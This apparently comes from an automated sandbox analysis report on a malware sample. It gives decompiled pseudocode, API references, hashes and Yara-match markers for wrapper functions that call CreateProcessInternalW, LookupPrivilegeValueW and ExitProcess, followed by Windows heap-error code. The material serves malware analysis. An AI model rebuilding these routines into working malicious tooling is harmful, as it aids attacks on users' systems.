                                                                      • Instruction Fuzzy Hash: 7E01AFB2210108BBCB58DF89DC84EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 37%
                                                                      			E0041894F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                                      				void* _t23;
                                                                      				void* _t34;
                                                                      				void* _t35;
                                                                      				intOrPtr* _t36;
                                                                      				void* _t38;
                                                                      
                                                                      				_t17 = _a4;
                                                                      				_t3 = _t17 + 0xc80; // 0x8bec97d5
                                                                      				_t36 = _t3;
                                                                      				E004191D0(_t34, _a4, _t36,  *((intOrPtr*)(_t17 + 0xa14)), 0, 0x37);
                                                                      				_t23 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _t35, _t38); // executed
                                                                      				return _t23;
                                                                      			}








                                                                      0x00418953
                                                                      0x00418962
                                                                      0x00418962
                                                                      0x0041896a
                                                                      0x004189a4
                                                                      0x004189a8

                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,z@,?,?,?), ref: 004189A4
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 07484bd03f0e6aff14c3f999912742789f5b5fd8a2584d740707e81839c519c3
                                                                      • Instruction ID: dd9946934c6f2970027868929af1b40d4c544dc8b91ed5b216c99f50f1f292d5
                                                                      • Opcode Fuzzy Hash: 07484bd03f0e6aff14c3f999912742789f5b5fd8a2584d740707e81839c519c3
                                                                      • Instruction Fuzzy Hash: F501F2B6208148AFCB04CF99DC90DEB3BA9AF8C314F158258FA5997201C630E841CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 1883a298a2b7596fcba2e9ffa1fc5b8e8cdaaea7ca73b6deeb2bfda158875907
                                                                      • Instruction ID: 41a467c4fe67700fdf755fe294103d5bb07fbdcfe289b002915e81f6b8a53544
                                                                      • Opcode Fuzzy Hash: 1883a298a2b7596fcba2e9ffa1fc5b8e8cdaaea7ca73b6deeb2bfda158875907
                                                                      • Instruction Fuzzy Hash: 46E06DB12002046BDB14DF99CC85EDB37E89F89264F058254FE1A6B2D2C934E850C7F5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004188DF(void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                      				void* _v117;
                                                                      				char _t11;
                                                                      				void* _t18;
                                                                      
                                                                      				_t8 = _a4;
                                                                      				_t4 = _t8 + 0xc74; // 0xc74
                                                                      				E004191D0(_t18, _a4, _t4,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                      				_t11 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                      				return _t11;
                                                                      			}






                                                                      0x004188e3
                                                                      0x004188ef
                                                                      0x004188f7
                                                                      0x0041890d
                                                                      0x00418911

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 6d3aaf9998e7a192f195e19e9e1837e6f4a8bc0c2b94c28815a120341604129d
                                                                      • Instruction ID: 3de22143eccd3531714949b6cb1ff928370a4ec6a6285604c94e42dc025a1065
                                                                      • Opcode Fuzzy Hash: 6d3aaf9998e7a192f195e19e9e1837e6f4a8bc0c2b94c28815a120341604129d
                                                                      • Instruction Fuzzy Hash: E6E01AB12002047BDB28DF65CC89EEB7B69AF88354F154559FD4997242C631E914CAA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                      				char _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                                      				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}





                                                                      0x004188ef
                                                                      0x004188f7
                                                                      0x0041890d
                                                                      0x00418911

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041890D
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                      				int _t10;
                                                                      				void* _t15;
                                                                      
                                                                      				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                      				return _t10;
                                                                      			}





                                                                      0x00418a5a
                                                                      0x00418a70
                                                                      0x00418a74

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418A70
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 28%
                                                                      			E00418913(intOrPtr _a3, int _a7) {
                                                                      				void* _t13;
                                                                      
                                                                      				asm("in eax, dx");
                                                                      				asm("lodsb");
                                                                      				asm("aaa");
                                                                      				asm("sbb ebx, [gs:ecx-0x1374aa90]");
                                                                      				_t8 = _a3;
                                                                      				E004191D0(_t13, _a3, _a3 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a7);
                                                                      			}




                                                                      0x00418913
                                                                      0x00418916
                                                                      0x00418917
                                                                      0x0041891c
                                                                      0x00418923
                                                                      0x0041893a
                                                                      0x00418948

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 372f5065193222af8a838d11135083d52b0bc2a492e42639cb21afaebbc0a88a
                                                                      • Instruction ID: 199c1321bcf711ee00c0d61285e3909ebf664ed31ceeb88ae201b751e29af4e7
                                                                      • Opcode Fuzzy Hash: 372f5065193222af8a838d11135083d52b0bc2a492e42639cb21afaebbc0a88a
                                                                      • Instruction Fuzzy Hash: FBE08635200205BBDA20DF64CCD9ED37BA8DF0A750F1589A8F9995B342C571BA01CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00418920(intOrPtr _a4, int _a8) {
                                                                      				void* _t10;
                                                                      
                                                                      				_t5 = _a4;
                                                                      				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                      				ExitProcess(_a8);
                                                                      			}




                                                                      0x00418923
                                                                      0x0041893a
                                                                      0x00418948

                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.829544666.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ab8ed9b5328c2a021834bf3dc360876d07c984a1436b2e4c4e6086a5f8773952
                                                                      • Instruction ID: 1fbc2f74fa84c0119b641036d0a1f9b1e31dfa1b2bb8b483d63d1cf9aa5509ec
                                                                      • Opcode Fuzzy Hash: ab8ed9b5328c2a021834bf3dc360876d07c984a1436b2e4c4e6086a5f8773952
                                                                      • Instruction Fuzzy Hash: 6CB09B719014C5C5DB51D7A54608B17794477D0759F16C061D1420641F4778C095F6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Strings
                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 013CB352
                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 013CB47D
                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 013CB323
                                                                      • The instruction at %p referenced memory at %p., xrefs: 013CB432
                                                                      • <unknown>, xrefs: 013CB27E, 013CB2D1, 013CB350, 013CB399, 013CB417, 013CB48E
                                                                      • The resource is owned exclusively by thread %p, xrefs: 013CB374
                                                                      • a NULL pointer, xrefs: 013CB4E0
                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 013CB53F
                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 013CB48F
                                                                      • The critical section is owned by thread %p., xrefs: 013CB3B9
                                                                      • *** enter .cxr %p for the context, xrefs: 013CB50D
                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013CB38F
                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 013CB2DC
                                                                      • *** Inpage error in %ws:%s, xrefs: 013CB418
                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 013CB39B
                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 013CB2F3
                                                                      • The instruction at %p tried to %s , xrefs: 013CB4B6
                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 013CB314
                                                                      • This failed because of error %Ix., xrefs: 013CB446
                                                                      • write to, xrefs: 013CB4A6
                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 013CB484
                                                                      • Go determine why that thread has not released the critical section., xrefs: 013CB3C5
                                                                      • The resource is owned shared by %d threads, xrefs: 013CB37E
                                                                      • *** enter .exr %p for the exception record, xrefs: 013CB4F1
                                                                      • read from, xrefs: 013CB4AD, 013CB4B2
                                                                      • an invalid address, %p, xrefs: 013CB4CF
                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 013CB305
                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 013CB476
                                                                      • *** then kb to get the faulting stack, xrefs: 013CB51C
                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 013CB3D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                      • API String ID: 0-108210295
                                                                      • Opcode ID: 1de951e1d53fbf74899f1e57f182da3b1ea53d000623bb8ed44f822e9edad19b
                                                                      • Instruction ID: 69976e0d05bfc52d11565803b369485d5fc9829dbb6a4248b629ba88e04122a9
                                                                      • Opcode Fuzzy Hash: 1de951e1d53fbf74899f1e57f182da3b1ea53d000623bb8ed44f822e9edad19b
                                                                      • Instruction Fuzzy Hash: F981E575A00210FFDB2A6A8ECC56D7FBFA9EF56A9DF40404CF5043B256E2628851C772
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E013D1C06() {
                                                                      				signed int _t27;
                                                                      				char* _t104;
                                                                      				char* _t105;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr _t115;
                                                                      				intOrPtr _t117;
                                                                      				intOrPtr _t119;
                                                                      				intOrPtr _t120;
                                                                      
                                                                      				_t105 = 0x12f48a4;
                                                                      				_t104 = "HEAP: ";
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0131B150();
                                                                      				} else {
                                                                      					E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push( *0x140589c);
                                                                      				E0131B150("Heap error detected at %p (heap handle %p)\n",  *0x14058a0);
                                                                      				_t27 =  *0x1405898; // 0x0
                                                                      				if(_t27 <= 0xf) {
                                                                      					switch( *((intOrPtr*)(_t27 * 4 +  &M013D1E96))) {
                                                                      						case 0:
                                                                      							_t105 = "heap_failure_internal";
                                                                      							goto L21;
                                                                      						case 1:
                                                                      							goto L21;
                                                                      						case 2:
                                                                      							goto L21;
                                                                      						case 3:
                                                                      							goto L21;
                                                                      						case 4:
                                                                      							goto L21;
                                                                      						case 5:
                                                                      							goto L21;
                                                                      						case 6:
                                                                      							goto L21;
                                                                      						case 7:
                                                                      							goto L21;
                                                                      						case 8:
                                                                      							goto L21;
                                                                      						case 9:
                                                                      							goto L21;
                                                                      						case 0xa:
                                                                      							goto L21;
                                                                      						case 0xb:
                                                                      							goto L21;
                                                                      						case 0xc:
                                                                      							goto L21;
                                                                      						case 0xd:
                                                                      							goto L21;
                                                                      						case 0xe:
                                                                      							goto L21;
                                                                      						case 0xf:
                                                                      							goto L21;
                                                                      					}
                                                                      				}
                                                                      				L21:
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0131B150();
                                                                      				} else {
                                                                      					E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				_push(_t105);
                                                                      				E0131B150("Error code: %d - %s\n",  *0x1405898);
                                                                      				_t113 =  *0x14058a4; // 0x0
                                                                      				if(_t113 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0131B150("Parameter1: %p\n",  *0x14058a4);
                                                                      				}
                                                                      				_t115 =  *0x14058a8; // 0x0
                                                                      				if(_t115 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0131B150("Parameter2: %p\n",  *0x14058a8);
                                                                      				}
                                                                      				_t117 =  *0x14058ac; // 0x0
                                                                      				if(_t117 != 0) {
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E0131B150("Parameter3: %p\n",  *0x14058ac);
                                                                      				}
                                                                      				_t119 =  *0x14058b0; // 0x0
                                                                      				if(_t119 != 0) {
                                                                      					L41:
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E0131B150();
                                                                      					} else {
                                                                      						E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					_push( *0x14058b4);
                                                                      					E0131B150("Last known valid blocks: before - %p, after - %p\n",  *0x14058b0);
                                                                      				} else {
                                                                      					_t120 =  *0x14058b4; // 0x0
                                                                      					if(_t120 != 0) {
                                                                      						goto L41;
                                                                      					}
                                                                      				}
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E0131B150();
                                                                      				} else {
                                                                      					E0131B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				return E0131B150("Stack trace available at %p\n", 0x14058c0);
                                                                      			}











                                                                      0x013d1c10
                                                                      0x013d1c16
                                                                      0x013d1c1e
                                                                      0x013d1c3d
                                                                      0x013d1c3e
                                                                      0x013d1c20
                                                                      0x013d1c35
                                                                      0x013d1c3a
                                                                      0x013d1c44
                                                                      0x013d1c55
                                                                      0x013d1c5a
                                                                      0x013d1c65
                                                                      0x013d1c67
                                                                      0x00000000
                                                                      0x013d1c6e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013d1c67
                                                                      0x013d1cdc
                                                                      0x013d1ce5
                                                                      0x013d1d04
                                                                      0x013d1d05
                                                                      0x013d1ce7
                                                                      0x013d1cfc
                                                                      0x013d1d01
                                                                      0x013d1d0b
                                                                      0x013d1d17
                                                                      0x013d1d1f
                                                                      0x013d1d25
                                                                      0x013d1d30
                                                                      0x013d1d4f
                                                                      0x013d1d50
                                                                      0x013d1d32
                                                                      0x013d1d47
                                                                      0x013d1d4c
                                                                      0x013d1d61
                                                                      0x013d1d67
                                                                      0x013d1d68
                                                                      0x013d1d6e
                                                                      0x013d1d79
                                                                      0x013d1d98
                                                                      0x013d1d99
                                                                      0x013d1d7b
                                                                      0x013d1d90
                                                                      0x013d1d95
                                                                      0x013d1daa
                                                                      0x013d1db0
                                                                      0x013d1db1
                                                                      0x013d1db7
                                                                      0x013d1dc2
                                                                      0x013d1de1
                                                                      0x013d1de2
                                                                      0x013d1dc4
                                                                      0x013d1dd9
                                                                      0x013d1dde
                                                                      0x013d1df3
                                                                      0x013d1df9
                                                                      0x013d1dfa
                                                                      0x013d1e00
                                                                      0x013d1e0a
                                                                      0x013d1e13
                                                                      0x013d1e32
                                                                      0x013d1e33
                                                                      0x013d1e15
                                                                      0x013d1e2a
                                                                      0x013d1e2f
                                                                      0x013d1e39
                                                                      0x013d1e4a
                                                                      0x013d1e02
                                                                      0x013d1e02
                                                                      0x013d1e08
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x013d1e08
                                                                      0x013d1e5b
                                                                      0x013d1e7a
                                                                      0x013d1e7b
                                                                      0x013d1e5d
                                                                      0x013d1e72
                                                                      0x013d1e77
                                                                      0x013d1e95

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.830147581.00000000012F0000.00000040.00000001.sdmp, Offset: 012F0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: 58df002da77a68622b90d0b0d4ef17bb2e180f389b54237e289895ab883b3dc1
                                                                      • Instruction ID: e5af84baab9d672bc72d0425d3540eb50ecc4e5f7b7d9590cd2ee7980511098c
                                                                      • Opcode Fuzzy Hash: 58df002da77a68622b90d0b0d4ef17bb2e180f389b54237e289895ab883b3dc1
                                                                      • Instruction Fuzzy Hash: D061E437611149DFD616AB8AF894E31B3F8EB0893CB0A843EF9095F755D6349C508F0A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E01323D34(signed int* __ecx) {
                                                                      				signed int* _v8;
                                                                      				char _v12;
                                                                      				signed int* _v16;
                                                                      				signed int* _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int* _v48;
                                                                      				signed int* _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				char _v68;
                                                                      				signed int _t140;
                                                                      				signed int _t161;
                                                                      				signed int* _t236;
                                                                      				signed int* _t242;
                                                                      				signed int* _t243;
                                                                      				signed int* _t244;
                                                                      				signed int* _t245;
                                                                      				signed int _t255;
                                                                      				void* _t257;
                                                                      				signed int _t260;
                                                                      				void* _t262;
                                                                      				signed int _t264;
                                                                      				void* _t267;
                                                                      				signed int _t275;
                                                                      				signed int* _t276;
                                                                      				short* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int* _t280;
                                                                      				short* _t281;
                                                                      				signed int* _t282;
                                                                      				short* _t283;
                                                                      				signed int* _t284;
                                                                      				void* _t285;
                                                                      
                                                                      				_v60 = _v60 | 0xffffffff;
                                                                      				_t280 = 0;
                                                                      				_t242 = __ecx;
                                                                      				_v52 = __ecx;
                                                                      				_v8 = 0;
                                                                      				_v20 = 0;
                                                                      				_v40 = 0;
                                                                      				_v28 = 0;
                                                                      				_v32 = 0;
                                                                      				_v44 = 0;
                                                                      				_v56 = 0;
                                                                      				_t275 = 0;
                                                                      				_v16 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					_t280 = 0xc000000d;
                                                                      					_t140 = 0;
                                                                      					L50:
                                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                                      					_t242[0x13] = _t140;
                                                                      					_t242[0x16] = _v40;
                                                                      					_t242[0x18] = _v28;
                                                                      					_t242[0x14] = _v32;
                                                                      					_t242[0x17] = _t275;
                                                                      					_t242[0x15] = _v44;
                                                                      					_t242[0x11] = _v56;
                                                                      					_t242[0x12] = _v60;
                                                                      					return _t280;
                                                                      				}
                                                                      				if(E01321B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v56 = 1;
                                                                      					if(_v8 != 0) {
                                                                      						L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                      					}
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E01321B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v60 =  *_v8;
                                                                      					L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                                      					_v8 = _t280;
                                                                      				}
                                                                      				if(E01321B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      					L16:
                                                                      					if(E01321B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      						L28:
                                                                      						if(E01321B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                                      							L46:
                                                                      							_t275 = _v16;
                                                                      							L47:
                                                                      							_t161 = 0;
                                                                      							L48:
                                                                      							if(_v8 != 0) {
                                                                      								L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                                      							}
                                                                      							_t140 = _v20;
                                                                      							if(_t140 != 0) {
                                                                      								if(_t275 != 0) {
                                                                      									L013377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                                      									_t275 = 0;
                                                                      									_v28 = 0;
                                                                      									_t140 = _v20;
                                                                      								}
                                                                      							}
                                                                      							goto L50;
                                                                      						}
                                                                      						_t167 = _v12;
                                                                      						_t255 = _v12 + 4;
                                                                      						_v44 = _t255;
                                                                      						if(_t255 == 0) {
                                                                      							_t276 = _t280;
                                                                      							_v32 = _t280;
                                                                      						} else {
                                                                      							_t276 = L01334620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                                      							_t167 = _v12;
                                                                      							_v32 = _t276;
                                                                      						}
                                                                      						if(_t276 == 0) {
                                                                      							_v44 = _t280;
                                                                      							_t280 = 0xc0000017;
                                                                      							goto L46;
                                                                      						} else {
                                                                      							E0135F3E0(_t276, _v8, _t167);
                                                                      							_v48 = _t276;
                                                                      							_t277 = E01361370(_t276, 0x12f4e90);
                                                                      							_pop(_t257);
                                                                      							if(_t277 == 0) {
                                                                      								L38:
                                                                      								_t170 = _v48;
                                                                      								if( *_v48 != 0) {
                                                                      									E0135BB40(0,  &_v68, _t170);
